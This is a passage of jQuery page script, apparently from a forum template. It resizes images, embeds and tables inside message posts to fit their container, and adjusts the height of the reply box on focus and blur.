var jmessagelist = $('div.message');
var first_width = jmessagelist.width();
jmessagelist.each(function() {
var jdiv = $(this);
var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width();
var jmessage_width = Math.min(jdiv.width(), maxwidth);
jdiv.find('img, embed, iframe, video').each(function() {
var jimg = $(this);
var img_width = this.org_width;
var img_height = this.org_height;
if(!img_width) {
var img_width = jimg.attr('width');
var img_height = jimg.attr('height');
this.org_width = img_width;
this.org_height = img_height;
}
if(img_width > jmessage_width) {
if(this.tagName == 'IMG') {
jimg.width(jmessage_width);
jimg.css('height', 'auto');
jimg.css('cursor', 'pointer');
jimg.on('click', function() {
});
} else {
jimg.width(jmessage_width);
var height = (img_height / img_width) * jimg.width();
jimg.height(height);
}
}
});
});
}
function resize_table() {
$('div.message').each(function() {
var jdiv = $(this);
jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>');
});
}
$(function() {
resize_image();
resize_table();
$(window).on('resize', resize_image);
});
var jmessage = $('#message');
jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); });
jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); });
$('#nav li[data-active="fid-1"]').addClass('active');
</script>
